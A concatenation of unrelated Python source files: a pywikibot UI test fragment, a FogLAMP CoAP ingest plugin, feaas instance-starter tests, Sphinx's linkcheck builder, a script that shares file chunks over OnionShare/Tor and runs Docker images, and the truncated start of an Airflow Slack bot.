def sendstdin(self, text):
self.setclip(text.replace(u"\n", u"\r\n"))
self._app.window_().SetFocus()
self._app.window_().TypeKeys('% {UP}{UP}{UP}{RIGHT}{DOWN}{DOWN}{ENTER}', with_spaces=True)
self.setclip(u'')
def setUp(self):
super(TestWindowsTerminalUnicode, self).setUp()
self.pywikibot.set_config('colorized_output', True)
self.pywikibot.set_config('transliterate', False)
self.pywikibot.set_config('console_encoding', 'utf-8')
self.pywikibot.set_ui('transliteration_target', None)
self.pywikibot.set_ui('encoding', 'utf-8')
self.pywikibot.cls()
self.setclip(u'')
def testOutputUnicodeText_no_transliterate(self):
self.pywikibot.output(u"Заглавная_страница")
self.assertEqual(self.getstdouterr(), u"Заглавная_страница\n")
def testOutputUnicodeText_transliterate(self):
self.pywikibot.set_config('transliterate', True)
self.pywikibot.set_ui('transliteration_target', 'latin-1')
self.pywikibot.output(u"Заглавная_страница")
self.assertEqual(self.getstdouterr(), "Zaglavnaya_stranica\n")
def testInputUnicodeText(self):
self.pywikibot.set_config('transliterate', True)
self.pywikibot.request_input(u"Википедию? ")
self.assertEqual(self.getstdouterr(), u"Википедию?")
self.sendstdin(u"Заглавная_страница\n")
returned = self.pywikibot.get_input()
self.assertEqual(returned, u"Заглавная_страница")
try:
try:
unittest.main()
except SystemExit:
pass
finally:
unpatch()
pywikibot.stopme()
else:
class TestTerminalUI(unittest.TestCase):
@unittest.skip("Terminal UI tests can only be run by directly running tests/ui_tests.py")
def testCannotBeRun(self):
pass
|
coap.py | # -*- coding: utf-8 -*-
# FOGLAMP_BEGIN
# See: http://foglamp.readthedocs.io/
# FOGLAMP_END
"""CoAP handler for sensor readings"""
import asyncio
import copy
import logging
from threading import Thread
import aiocoap.resource
import aiocoap.error
import cbor2
from foglamp.common import logger
from foglamp.plugins.common import utils
import async_ingest
__author__ = "Terris Linenbach, Amarendra K Sinha"
__copyright__ = "Copyright (c) 2017 OSIsoft, LLC"
__license__ = "Apache 2.0"
__version__ = "${VERSION}"
_LOGGER = logger.setup(__name__, level=logging.INFO)
c_callback = None
c_ingest_ref = None
loop = None
_task = None
t = None
_DEFAULT_CONFIG = {
'plugin': {
'description': 'CoAP Listener South Plugin',
'type': 'string',
'default': 'coap',
'readonly': 'true'
},
'port': {
'description': 'Port to listen on',
'type': 'integer',
'default': '5683',
'order': '1',
'displayName': 'Port'
},
'uri': {
'description': 'URI to accept data on',
'type': 'string',
'default': 'sensor-values',
'order': '2',
'displayName': 'URI'
}
}
aiocoap_ctx = None
async def _start_aiocoap(uri, port):
root = aiocoap.resource.Site()
root.add_resource(('.well-known', 'core'),
aiocoap.resource.WKCResource(root.get_resources_as_linkheader))
root.add_resource(('other', uri), CoAPIngest())
global aiocoap_ctx
aiocoap_ctx = await aiocoap.Context().create_server_context(root, bind=('::', int(port)))
_LOGGER.info('CoAP listener started on port {} with uri {}'.format(port, uri))
def plugin_info():
""" Returns information about the plugin.
Args:
Returns:
dict: plugin information
Raises:
"""
return {'name': 'CoAP Plugin',
'version': '1.7.0',
'mode': 'async',
'type': 'south',
'interface': '1.0',
'config': _DEFAULT_CONFIG
}
def plugin_init(config):
""" Registers CoAP handler to accept sensor readings
Args:
config: JSON configuration document for the South plugin configuration category
Returns:
handle: JSON object to be used in future calls to the plugin
Raises:
"""
handle = copy.deepcopy(config)
return handle
def plugin_start(handle):
""" Starts the South service ingress process.
Used only for plugins that support async IO.
Args:
handle: handle returned by the plugin initialisation call
Returns:
Raises:
"""
global _task, loop, t
uri = handle['uri']['value']
port = handle['port']['value']
loop = asyncio.new_event_loop()
_task = asyncio.ensure_future(_start_aiocoap(uri, port), loop=loop)
def run():
global loop
loop.run_forever()
t = Thread(target=run)
t.start()
def plugin_reconfigure(handle, new_config):
""" Reconfigures the plugin
it should be called when the configuration of the plugin is changed during the operation of the South service;
The new configuration category should be passed.
Args:
handle: handle returned by the plugin initialisation call
new_config: JSON object representing the new configuration category for the category
Returns:
new_handle: new handle to be used in the future calls
Raises:
"""
_LOGGER.info("Old config for CoAP plugin {} \n new config {}".format(handle, new_config))
plugin_shutdown(handle)
new_handle = plugin_init(new_config)
plugin_start(new_handle)
return new_handle
def plugin_shutdown(handle):
""" Shutdowns the plugin doing required cleanup, to be called prior to the South service being shut down.
Args:
handle: handle returned by the plugin initialisation call
Returns:
Raises:
"""
_LOGGER.info('Stopping South CoAP plugin...')
global aiocoap_ctx, _task, loop
try:
if aiocoap_ctx is not None:
asyncio.ensure_future(aiocoap_ctx.shutdown(), loop=loop)
if _task is not None:
_task.cancel()
_task = None
if loop is not None:
loop.stop()
except Exception as ex:
_LOGGER.exception('Error in shutting down CoAP plugin {}'.format(str(ex)))
raise
def plugin_register_ingest(handle, callback, ingest_ref):
"""Required plugin interface component to communicate to South C server
Args:
handle: handle returned by the plugin initialisation call
callback: C opaque object required to passed back to C->ingest method
ingest_ref: C opaque object required to passed back to C->ingest method
"""
global c_callback, c_ingest_ref
c_callback = callback
c_ingest_ref = ingest_ref
class CoAPIngest(aiocoap.resource.Resource):
"""Handles incoming sensor readings from CoAP"""
@staticmethod
async def render_post(request):
"""Store sensor readings from CoAP to FogLAMP
Args:
request:
The payload is a cbor-encoded array that decodes to JSON
similar to the following:
.. code-block:: python
{
"timestamp": "2017-01-02T01:02:03.23232Z-05:00",
"asset": "pump1",
"readings": {
"velocity": "500",
"temperature": {
"value": "32",
"unit": "kelvin"
}
}
}
"""
# aiocoap handlers must be defensive about exceptions. If an exception
# is raised out of a handler, it is permanently disabled by aiocoap.
# Therefore, Exception is caught instead of specific exceptions.
code = aiocoap.numbers.codes.Code.VALID
message = ''
try:
try:
payload = cbor2.loads(request.payload)
except Exception:
raise ValueError('Payload must be a dictionary')
asset = payload['asset']
timestamp = payload['timestamp']
# readings or sensor_values are optional
try:
readings = payload['readings']
except KeyError:
readings = payload['sensor_values'] # sensor_values is deprecated
# if optional then
# TODO: confirm, do we want to check this?
if not isinstance(readings, dict):
raise ValueError('readings must be a dictionary')
data = {
'asset': asset,
'timestamp': timestamp,
'readings': readings
}
async_ingest.ingest_callback(c_callback, c_ingest_ref, data)
except (KeyError, ValueError, TypeError) as e:
_LOGGER.exception("%d: %s", aiocoap.numbers.codes.Code.BAD_REQUEST, str(e))
raise aiocoap.error.BadRequest(str(e))
except Exception as ex:
_LOGGER.exception("%d: %s", aiocoap.numbers.codes.Code.INTERNAL_SERVER_ERROR, str(ex))
raise aiocoap.error.ConstructionRenderableError(str(ex))
return aiocoap.Message(payload=message.encode('utf-8'), code=code)
|
test_instance_starter.py | # Copyright 2014 varnishapi authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import threading
import time
import unittest
import mock
from feaas import storage
from feaas.runners import instance_starter
class InstanceStarterTestCase(unittest.TestCase):
def test_init(self):
strg = storage.MongoDBStorage()
manager = mock.Mock(storage=strg)
starter = instance_starter.InstanceStarter(manager, interval=3)
self.assertEqual(manager, starter.manager)
self.assertEqual(strg, starter.storage)
self.assertEqual(3, starter.interval)
self.assertEqual(strg.db, starter.locker.db)
def test_loop_and_stop(self):
strg = mock.Mock()
manager = mock.Mock(storage=strg)
fake_run = mock.Mock()
starter = instance_starter.InstanceStarter(manager, interval=3)
starter.run = fake_run
t = threading.Thread(target=starter.loop)
t.start()
time.sleep(1)
starter.stop()
t.join()
fake_run.assert_called_once()
self.assertFalse(starter.running)
def test_run(self):
instance = storage.Instance(name="something")
manager = mock.Mock(storage=mock.Mock())
get_instance = mock.Mock()
get_instance.return_value = instance
starter = instance_starter.InstanceStarter(manager, interval=3)
starter.get_instance = get_instance
starter.start_instance = mock.Mock()
starter.run()
starter.get_instance.assert_called_once()
starter.start_instance.assert_called_with(instance)
def test_run_instance_not_found(self):
manager = mock.Mock(storage=mock.Mock())
starter = instance_starter.InstanceStarter(manager, interval=3)
starter.get_instance = mock.Mock(side_effect=storage.InstanceNotFoundError())
starter.start_instance = mock.Mock()
starter.run()
starter.start_instance.assert_not_called()
def test_get_instance(self):
instance = storage.Instance(name="something")
strg = mock.Mock()
strg.retrieve_instance.return_value = instance
manager = mock.Mock(storage=strg)
starter = instance_starter.InstanceStarter(manager, interval=3)
starter.locker = mock.Mock()
got_instance = starter.get_instance()
self.assertEqual(instance, got_instance)
self.assertEqual("starting", got_instance.state)
strg.retrieve_instance.assert_called_with(state="creating")
strg.store_instance.assert_called_with(instance)
starter.locker.lock.assert_called_with(starter.lock_name)
starter.locker.unlock.assert_called_with(starter.lock_name)
def test_get_instance_not_found(self):
strg = mock.Mock()
strg.retrieve_instance.side_effect = storage.InstanceNotFoundError()
manager = mock.Mock(storage=strg)
starter = instance_starter.InstanceStarter(manager, interval=3)
starter.locker = mock.Mock()
with self.assertRaises(storage.InstanceNotFoundError):
starter.get_instance()
starter.locker.lock.assert_called_with(starter.lock_name)
starter.locker.unlock.assert_called_with(starter.lock_name)
def test_start_instance(self):
instance = storage.Instance(name="something")
strg = mock.Mock()
manager = mock.Mock(storage=strg)
starter = instance_starter.InstanceStarter(manager, interval=3)
starter.locker = mock.Mock()
starter.start_instance(instance)
self.assertEqual("started", instance.state)
starter.locker.lock.assert_called_with(starter.lock_name)
manager.start_instance.assert_called_with(instance.name)
starter.locker.unlock.assert_called_with(starter.lock_name)
strg.store_instance.assert_called_with(instance, save_units=False)
@mock.patch("sys.stderr")
def test_start_instance_error(self, stderr):
instance = storage.Instance(name="something")
strg = mock.Mock()
manager = mock.Mock(storage=strg)
manager.start_instance.side_effect = ValueError("something went wrong")
starter = instance_starter.InstanceStarter(manager, interval=3)
starter.locker = mock.Mock()
starter.start_instance(instance)
self.assertEqual("error", instance.state)
starter.locker.lock.assert_called_with(starter.lock_name)
starter.locker.unlock.assert_called_with(starter.lock_name)
strg.store_instance.assert_called_with(instance, save_units=False)
stderr.write.assert_called_with("[ERROR] failed to start instance: something went wrong\n")
|
linkcheck.py | # -*- coding: utf-8 -*-
"""
sphinx.builders.linkcheck
~~~~~~~~~~~~~~~~~~~~~~~~~
The CheckExternalLinksBuilder class.
:copyright: Copyright 2007-2017 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
import socket
import codecs
import threading
from os import path
from requests.exceptions import HTTPError
from six.moves import queue, html_parser
from six.moves.urllib.parse import unquote
from docutils import nodes
# 2015-06-25 barry@python.org. This exception was deprecated in Python 3.3 and
# removed in Python 3.5, however for backward compatibility reasons, we're not
# going to just remove it. If it doesn't exist, define an exception that will
# never be caught but leaves the code in check_anchor() intact.
try:
from six.moves.html_parser import HTMLParseError # type: ignore
except ImportError:
class HTMLParseError(Exception): # type: ignore
pass
from sphinx.builders import Builder
from sphinx.util import encode_uri, requests, logging
from sphinx.util.console import ( # type: ignore
purple, red, darkgreen, darkgray, darkred, turquoise
)
from sphinx.util.requests import is_ssl_error
if False:
# For type annotation
from typing import Any, Dict, List, Set, Tuple, Union # NOQA
from sphinx.application import Sphinx # NOQA
from sphinx.util.requests.requests import Response # NOQA
logger = logging.getLogger(__name__)
class AnchorCheckParser(html_parser.HTMLParser):
"""Specialized HTML parser that looks for a specific anchor."""
def __init__(self, search_anchor):
# type: (unicode) -> None
html_parser.HTMLParser.__init__(self)
self.search_anchor = search_anchor
self.found = False
def handle_starttag(self, tag, attrs):
for key, value in attrs:
if key in ('id', 'name') and value == self.search_anchor:
self.found = True
break
def check_anchor(response, anchor):
# type: (Response, unicode) -> bool
"""Reads HTML data from a response object `response` searching for `anchor`.
Returns True if anchor was found, False otherwise.
"""
parser = AnchorCheckParser(anchor)
try:
# Read file in chunks. If we find a matching anchor, we break
# the loop early in hopes not to have to download the whole thing.
for chunk in response.iter_content(chunk_size=4096, decode_unicode=True):
parser.feed(chunk)
if parser.found:
break
parser.close()
except HTMLParseError:
# HTMLParser is usually pretty good with sloppy HTML, but it tends to
# choke on EOF. But we're done then anyway.
pass
return parser.found
class CheckExternalLinksBuilder(Builder):
"""
Checks for broken external links.
"""
name = 'linkcheck'
def init(self):
# type: () -> None
self.to_ignore = [re.compile(x) for x in self.app.config.linkcheck_ignore]
self.anchors_ignore = [re.compile(x)
for x in self.app.config.linkcheck_anchors_ignore]
self.good = set() # type: Set[unicode]
self.broken = {} # type: Dict[unicode, unicode]
self.redirected = {} # type: Dict[unicode, Tuple[unicode, int]]
# set a timeout for non-responding servers
socket.setdefaulttimeout(5.0)
# create output file
open(path.join(self.outdir, 'output.txt'), 'w').close()
# create queues and worker threads
self.wqueue = queue.Queue() # type: queue.Queue
self.rqueue = queue.Queue() # type: queue.Queue
self.workers = [] # type: List[threading.Thread]
for i in range(self.app.config.linkcheck_workers):
thread = threading.Thread(target=self.check_thread)
thread.setDaemon(True)
thread.start()
self.workers.append(thread)
def check_thread(self):
# type: () -> None
kwargs = {}
if self.app.config.linkcheck_timeout:
kwargs['timeout'] = self.app.config.linkcheck_timeout
kwargs['allow_redirects'] = True
def check_uri():
# type: () -> Tuple[unicode, unicode, int]
# split off anchor
if '#' in uri:
req_url, anchor = uri.split('#', 1)
for rex in self.anchors_ignore:
if rex.match(anchor):
anchor = None
break
else:
req_url = uri
anchor = None
# handle non-ASCII URIs
try:
req_url.encode('ascii')
except UnicodeError:
req_url = encode_uri(req_url)
try:
if anchor and self.app.config.linkcheck_anchors:
# Read the whole document and see if #anchor exists
response = requests.get(req_url, stream=True, config=self.app.config,
**kwargs)
found = check_anchor(response, unquote(anchor))
if not found:
raise Exception("Anchor '%s' not found" % anchor)
else:
try:
# try a HEAD request first, which should be easier on
# the server and the network
response = requests.head(req_url, config=self.app.config, **kwargs)
response.raise_for_status()
except HTTPError as err:
# retry with GET request if that fails, some servers
# don't like HEAD requests.
response = requests.get(req_url, stream=True, config=self.app.config,
**kwargs)
response.raise_for_status()
except HTTPError as err:
if err.response.status_code == 401:
# We'll take "Unauthorized" as working.
return 'working', ' - unauthorized', 0
else:
return 'broken', str(err), 0
except Exception as err:
if is_ssl_error(err):
return 'ignored', str(err), 0
else:
return 'broken', str(err), 0
if response.url.rstrip('/') == req_url.rstrip('/'):
return 'working', '', 0
else:
new_url = response.url
if anchor:
new_url += '#' + anchor
# history contains any redirects, get last
if response.history:
code = response.history[-1].status_code
return 'redirected', new_url, code
else:
return 'redirected', new_url, 0
def check():
# type: () -> Tuple[unicode, unicode, int]
# check for various conditions without bothering the network
if len(uri) == 0 or uri.startswith(('#', 'mailto:', 'ftp:')):
return 'unchecked', '', 0
elif not uri.startswith(('http:', 'https:')):
return 'local', '', 0
elif uri in self.good:
return 'working', 'old', 0
elif uri in self.broken:
return 'broken', self.broken[uri], 0
elif uri in self.redirected:
return 'redirected', self.redirected[uri][0], self.redirected[uri][1]
for rex in self.to_ignore:
if rex.match(uri):
return 'ignored', '', 0
# need to actually check the URI
for _ in range(self.app.config.linkcheck_retries):
status, info, code = check_uri()
if status != "broken":
break
if status == "working":
self.good.add(uri)
elif status == "broken":
self.broken[uri] = info
elif status == "redirected":
self.redirected[uri] = (info, code)
return (status, info, code)
while True:
uri, docname, lineno = self.wqueue.get()
if uri is None:
break
status, info, code = check()
self.rqueue.put((uri, docname, lineno, status, info, code))
def process_result(self, result):
# type: (Tuple[unicode, unicode, int, unicode, unicode, int]) -> None
uri, docname, lineno, status, info, code = result
if status == 'unchecked':
return
if status == 'working' and info == 'old':
return
if lineno:
logger.info('(line %4d) ', lineno, nonl=1)
if status == 'ignored':
if info:
logger.info(darkgray('-ignored- ') + uri + ': ' + info)
else:
logger.info(darkgray('-ignored- ') + uri)
elif status == 'local':
logger.info(darkgray('-local- ') + uri)
self.write_entry('local', docname, lineno, uri)
elif status == 'working':
logger.info(darkgreen('ok ') + uri + info)
elif status == 'broken':
self.write_entry('broken', docname, lineno, uri + ': ' + info)
if self.app.quiet or self.app.warningiserror:
logger.warning('broken link: %s (%s)', uri, info,
location=(self.env.doc2path(docname), lineno))
else:
logger.info(red('broken ') + uri + red(' - ' + info))
elif status == 'redirected':
text, color = {
301: ('permanently', darkred),
302: ('with Found', purple),
303: ('with See Other', purple),
307: ('temporarily', turquoise),
0: ('with unknown code', purple),
}[code]
self.write_entry('redirected ' + text, docname, lineno,
uri + ' to ' + info)
logger.info(color('redirect ') + uri + color(' - ' + text + ' to ' + info))
def get_target_uri(self, docname, typ=None):
# type: (unicode, unicode) -> unicode
return ''
def get_outdated_docs(self):
# type: () -> Set[unicode]
return self.env.found_docs
def prepare_writing(self, docnames):
# type: (nodes.Node) -> None
return
def write_doc(self, docname, doctree):
# type: (unicode, nodes.Node) -> None
logger.info('')
n = 0
for node in doctree.traverse(nodes.reference):
if 'refuri' not in node:
continue
uri = node['refuri']
lineno = None
while lineno is None:
node = node.parent
if node is None:
break
lineno = node.line
self.wqueue.put((uri, docname, lineno), False)
n += 1
done = 0
while done < n:
self.process_result(self.rqueue.get())
done += 1
if self.broken:
self.app.statuscode = 1
def write_entry(self, what, docname, line, uri):
# type: (unicode, unicode, int, unicode) -> None
with codecs.open(path.join(self.outdir, 'output.txt'), 'a', 'utf-8') as output: # type: ignore # NOQA
output.write("%s:%s: [%s] %s\n" % (self.env.doc2path(docname, None),
line, what, uri))
def finish(self):
# type: () -> None
for worker in self.workers:
self.wqueue.put((None, None, None), False)
def setup(app):
# type: (Sphinx) -> Dict[unicode, Any]
app.add_builder(CheckExternalLinksBuilder)
app.add_config_value('linkcheck_ignore', [], None)
app.add_config_value('linkcheck_retries', 1, None)
app.add_config_value('linkcheck_timeout', None, None, [int])
app.add_config_value('linkcheck_workers', 5, None)
app.add_config_value('linkcheck_anchors', True, None)
# Anchors starting with ! are ignored since they are
# commonly used for dynamic pages
app.add_config_value('linkcheck_anchors_ignore', ["^!"], None)
return {
'version': 'builtin',
'parallel_read_safe': True,
'parallel_write_safe': True,
}
|
execute.py | import os
import sys
from flask import Flask
import requests as r
import time
import json
from signal import signal, SIGINT
import threading
from datetime import datetime
import numpy as np
import math
##globals##
threads = 8
threadL = []
orderAddr = []
order = []
startTimes = []
mainThread = None
totalAddr = None
totalStartTime = 0
content = [0] * threads #inits list with threads number of 0s
mode = '' #user, provider, or validator
fileName = ''
#######################################################################################################################################
###########################################################host########################################################################
#######################################################################################################################################
def shareOrder():
global totalStartTime
totalStartTime = time.time()
os.system("script -c \"~/onionshare/dev_scripts/onionshare --website totalOrder.txt" + "\" -f onionshareOrder.txt")
def startShare(file, iter):
#print(file + ":" + str(iter))
#start onionshare server to host file
os.system("script -c \"~/onionshare/dev_scripts/onionshare --website " + file + "\" -f onionshare" + str(iter) + ".txt")
def splitFile(file):
fileName = file
f = open(file,'rb')
lines = f.readlines()
lineLen = len(lines)
pos = 0
#print(lines)
print(lineLen)
for i in range(0, threads):
fw = open(file+str(i)+'.txt' ,'wb')
lo = int((i)*(lineLen/threads))
hi = int((i+1)*(lineLen/threads))
print("lo:" + str(lo) + " hi:" + str(hi))
fw.writelines(lines[lo:hi])
fw.close()
order.append(file+str(i)+'.txt\n')
f.close()
f = open('order.txt', 'w')
f.writelines(order)
f.close()
def createThreadsHost():
f = open("order.txt" , 'r')
orderFile = f.readlines()
f.close()
j = 0
for i in orderFile:
t=threading.Thread(target=startShare,args=[i.strip('\n'),j])
threadL.append(t)
j += 1
def runThreads():
for i in threadL:
i.start()
startTimes.append(time.time())
def getAddrs():
for i in range(0,threads):
orderAddr.append(0)
t = 0
while t < threads:
t = 0
for i in orderAddr:
if i != 0:
t +=1
for i in range(0,threads):
if os.path.isfile('onionshare'+str(i)+'.txt'):
f = open('onionshare'+str(i)+'.txt', 'r')
lines = f.readlines()
f.close()
for j in lines:
if (j.find("http://onionshare") >= 0): #found address
orderAddr[i] = j.strip('\n') + "/" + order[i].strip('\n')
print(orderAddr)
time.sleep(5)
print(orderAddr)
f = open('totalOrder.txt', 'w')
for i in orderAddr:
f.write(i + '\n')
f.close()
def getTotalAddr():
global totalAddr
flag = True
while(flag):
if os.path.isfile('onionshareOrder.txt'):
f = open('onionshareOrder.txt', 'r')
lines = f.readlines()
f.close()
for j in lines:
if (j.find("http://onionshare") >= 0): #found address
totalAddr = j.strip('\n') + "/totalOrder.txt"
flag = False
time.sleep(5)
#Write address to file
f = open('totalOrderAddress.txt', 'w')
f.write(totalAddr)
f.close()
def threadRestarter():
while(True):
for i in range(0,threads):
if time.time() > startTimes[i] + 60 and orderAddr[i] == 0:
os.system('rm onionshare' + str(i) + '.txt')
threadL[i]._delete()
f = open("order.txt" , 'r')
lines = f.readlines()
f.close()
t=threading.Thread(target=startShare,args=[lines[i].strip('\n'),i])
threadL[i] = t
threadL[i].start()
startTimes[i] = time.time()
f = open('restart.txt', 'a')
f.write("thread:" + str(i) + ' has been restarted at:' + str(time.time()) + ' due to time issue\n')
f.close()
for i in range(0,threads):
if os.path.isfile('onionshare' + str(i) + '.txt' ):
f = open('onionshare' + str(i) + '.txt' )
lines = f.readlines()
for line in lines:
if line.find('in use') >= 0:
os.system('rm onionshare' + str(i) + '.txt')
threadL[i]._delete()
f = open("order.txt" , 'r')
lines = f.readlines()
f.close()
t=threading.Thread(target=startShare,args=[lines[i].strip('\n'),i])
threadL[i] = t
threadL[i].start()
startTimes[i] = time.time()
f = open('restart.txt', 'a')
f.write("thread:" + str(i) + ' has been restarted at:' + str(time.time()) + ' due to address error\n')
f.close()
time.sleep(5)
def hostReqFail():
os.system("script -c \"~/onionshare/dev_scripts/onionshare --website reqFails.txt" + "\" -f reqFailLog.txt")
def reqFail():
failThread = threading.Thread(target=hostReqFail)
threadOn = False
global threads
reqMade = [0]*threads
callSum = 0
while True:
time.sleep(120)
for i in range(0,threads):
if os.path.isfile('onionshare' + str(i) + '.txt'):
f = open('onionshare' + str(i) + '.txt')
lines = f.readlines()
f.close()
for line in lines:
if reqMade[i] == 0 and line.find('get') >= 0:
reqMade[i] = 1
callSum += 1
if callSum >= (threads/2) and callSum != threads:
f = open('reqFails.txt', 'w')
for i in range(0,threads):
if reqMade[i] == 0:
f.write(str(i)+'\n')
if threadOn:
failThread._delete()
failThread = threading.Thread(target=hostReqFail)
failThread.start()
threadOn = True
else:
failThread.start()
threadOn = True
if callSum == threads:
failThread._delete()
threadOn = False
def totalThreadRestarter():
global totalStartTime
global totalAddr
global mainThread
while (True):
if time.time() > totalStartTime + 60 and totalAddr == 0:
os.system('rm onionshareOrder.txt')
#restart thread
mainThread._delete()
t = threading.Thread(target=shareOrder)
mainThread = t
mainThread.start()
totalStartTime = time.time()
f = open('restart.txt', 'a')
f.write("thread: for toalOrder has been restarted at:" + str(time.time()) + ' due to time issue\n')
f.close()
def resetHost():
global threadL
global orderAddr
global order
global startTimes
global mode
global fileName
global totalAddr
for i in threadL:
i._delete()
threadL = []
orderAddr = []
order = []
startTimes = []
mode = ''
fileName = ''
totalAddr = ''
os.remove("totalOrder.txt")
os.remove('onionShareOrder.txt')
os.remove('onionshare*.txt')
os.remove('order.txt')
os.remove(fileName + '*.txt')
def failingCheck():
global threadL
while True:
time.sleep(120)
positions = []
try:
session = r.session()
session.proxies = {}
session.proxies['http'] = 'socks5h://localhost:9050'
session.proxies['https'] = 'socks5h://localhost:9050'
fails = session.get(totalAddr + '/reqFails.txt')
f = open('reqFails.txt', 'wb').write(fails.contetn)
f.close()
f = open('reqFails.txt', 'r')
lines = f.readlines()
f.close()
for line in lines:
positions.append(int(line).rstrip())
f = open('totalOrder.txt', 'r')
lines = f.readlines()
for pos in positions:
threadL[pos]._delete()
threadL[pos] = threading.Thread(target=getShare,args=[lines[pos].rstrip(),pos])
threadL[pos].start()
except:
pass
#######################################################################################################################################
########################################################request########################################################################
#######################################################################################################################################
def getShare(address, iter):
session = r.session()
session.proxies = {}
session.proxies['http'] = 'socks5h://localhost:9050'
session.proxies['https'] = 'socks5h://localhost:9050'
res = session.get(address) #download file
content[iter] = res.content #append this slice's content to total content list
#This thread unneeded now, can safely kill it
killMe(iter)
def getShareWithoutIter(address):
session = r.session()
session.proxies = {}
session.proxies['http'] = 'socks5h://localhost:9050'
session.proxies['https'] = 'socks5h://localhost:9050'
res = session.get(address) #download file
open("totalOrder.txt", 'wb').write(res.content)
def createThreadsReq():
global totalAddr
flag = True
flagTwo = True
flagThree = True
while flag:
time.sleep(5)
#Addresses written to file (Step 2)
if os.path.isfile("totalOrder.txt") and flagTwo:
flagTwo = False
#Need to make a thread for each address
f = open("totalOrder.txt", 'r')
lines = f.readlines()
f.close()
j = 0
for line in lines:
t = threading.Thread(target=getShare,args=[line.strip('\n'), j])
threadL.append(t)
t.start()
j += 1
#Every slot in content has been written to (Step 3)
elif not (0 in content):
#print(content)
#Tell session it has finished
session = r.session()
session.proxies = {}
session.proxies['http'] = 'socks5h://localhost:9050'
session.proxies['https'] = 'socks5h://localhost:9050'
session.get(totalAddr + '/finish') #tell server finished downloading
#Save in chunks, converting to bytes
with open("image.zip", "wb") as f:
for i in range(threads):
for chunk in content[i]:
f.write(bytes(chunk))
resetReq()
flag = False
#totalOrder.txt not yet received (Step 1)
else:
statF = open("stat.txt", 'r')
totalAddr = statF.readline().rstrip()
statF.close()
#if file ready to be received from worker. totalAddr will hold the .onion address
if totalAddr != '' and totalAddr != 'Executing' and totalAddr != 'Ready' and flagThree:
flagThree = False
getShareWithoutIter(totalAddr) #download totalOrder.txt
def resetReq():
global content
global threadL
global mode
global mainThread
global totalAddr
content = [0] * threads
#kill all threads before resetting
for i in threadL:
i._delete()
threadL = []
mainThread = None
totalAddr = None
os.remove("totalOrder.txt")
mode = ''
os.remove('onionShareOrder.txt')
#kill specified thread
def killMe(iter):
threadL[iter]._delete()
#######################################################################################################################################
#####################################################controller########################################################################
#######################################################################################################################################
def getTime(mess):
now = datetime.now()
end = open('log.txt', 'r').readline().rstrip()[24:]
#print(now.strftime("%a %b %d %Y %H:%M:%S" + end))
time = now.strftime("%a %b %d %Y %H:%M:%S" + end)
f = open('log.txt', 'a')
f.write(time + " "+ mess)
f.close()
def hostController(file):
splitFile(file)
createThreadsHost()
runThreads()
#Restarter for threads
errCorr = threading.Thread(target=threadRestarter)
errCorr.start()
getAddrs()
failThread = threading.Thread(target=reqFail)
failThread.start()
#Total share
global mainThread
mainThread = threading.Thread(target=shareOrder)
mainThread.start()
#Restarter for total share
errCorrMain = threading.Thread(target=totalThreadRestarter)
errCorrMain.start()
getTotalAddr()
flag = True
while flag:
if os.path.isfile('onionshareOrder.txt'):
f = open('onionshareOrder.txt', 'r')
line = f.readline()
while line != '':
if "/finish" in line :
flag = False
errCorr._delete()
mainThread._delete()
line = f.readline()
f.close()
failThread._delete()
resetHost()
def reqController():
failThread = threading.Thread(target=failingCheck)
failThread.start()
createThreadsReq()
failThread._delete()
def dockerExe():
global mode
#this will load the image back into docker
os.system("sudo docker load -i image.tgz")
#this will start the container in a bash
os.system("sudo docker run -dit execute:latest bash")
getTime('Docker Image Loaded and Executing')
#this will execute the code
#0 -> Provider
#1 -> Validator
os.system("sudo docker exec $(sudo docker container ls -q) python3 execute.py " + str(0 if mode == "provider" else 1) )
#this will delete the old image file
os.system("sudo rm -rf image.tgz")
#this will update the container
os.system("sudo docker commit $(sudo docker container ls -q) execute:latest")
getTime("Execution Finished")
#this will remove the image to be transmitted to the next step
os.system("sudo docker save execute -o image.tgz")
#zip the image
os.system('sudo zip -0 image.zip image.tgz')
#this will stop the docker image
os.system("sudo docker stop $(sudo docker container ls -q)")
getTime('Image Unloaded and Ready For Transmission')
def getMode():
global mode
flag = True
while flag:
time.sleep(5)
if os.path.isfile('mode.txt'):
f = open("mode.txt", "r")
curLine = f.readline().rstrip()
f.close()
if(curLine == "provider" or curLine == 'validator' or curLine == "user"):
mode = curLine
flag = False
f = open('mode.txt', 'w')
f.close()
if __name__ == '__main__':
while True:
getMode()
if mode == 'user':
hostController('image.zip')
reqController()
else:
reqController()
dockerExe()
hostController('image.zip') |
slack_bot.py | import slack
import json
import json5
from collections import OrderedDict
import string
from airflow_api import get_variable, run_segmentation, \
update_slack_connection, check_running, dag_state, set_variable, \
sanity_check, chunkflow_set_env, run_inference, run_contact_surface, \
mark_dags_success, run_dag, run_igneous_tasks, run_custom_tasks
from bot_info import slack_token, botid, workerid
from kombu_helper import drain_messages
from copy import deepcopy
import requests
import re
import time
import logging
from secrets import token_hex
import threading
import queue
param_updated = False
def clear_queues():
with q_payload.mutex:
q_payload.queue.clear()
with q_cmd.mutex:
q_cmd.queue.clear()
def create_run_token(msg):
token = token_hex(16)
set_variable("run_token", token)
sc = slack.WebClient(slack_token, timeout=300)
userid = msg['user']
reply_msg = "use `{}, cancel run {}` to cancel the current run".format(workerid, token)
rc = sc.chat_postMessage(
channel=userid,
text=reply_msg
)
if not rc["ok"]:
print("Failed to send direct message")
print(rc)
def gcloud_ip():
metadata_url = "http://169.254.169.254/computeMetadata/v1/instance/network-interfaces/0/access-configs/0/external-ip"
response = requests.get(metadata_url, headers={"Metadata-Flavor": "Google"})
if response.status_code == 200:
return response.content.decode("ascii", "ignore")
else:
return "Unknown ip address"
def filter_msg(msg):
if 'subtype' in msg and msg['subtype'] != "thread_broadcast":
return False
text = msg["text"].strip('''_*~"'`''')
if text.startswith(botid):
cmd = extract_command(msg)
if cmd == "report":
report(msg)
return False
if re.search(r"^{}[\s,:]".format(workerid), text, re.IGNORECASE):
return True
def report(msg):
print("preparing report!")
if check_running():
replyto(msg, "{workerid}: busy running segmentation for {owner}".format(
workerid=workerid,
owner=task_owner
), username="seuronbot", broadcast=True)
else:
replyto(msg, "{workerid}: idle".format(
workerid=workerid
), username="seuronbot", broadcast=True)
def extract_command(msg):
cmd = msg["text"].replace(workerid, "").replace(botid, "")
cmd = cmd.translate(str.maketrans('', '', string.punctuation))
cmd = cmd.lower().replace(" ", "")
return cmd
def replyto(msg, reply, username=workerid, broadcast=False):
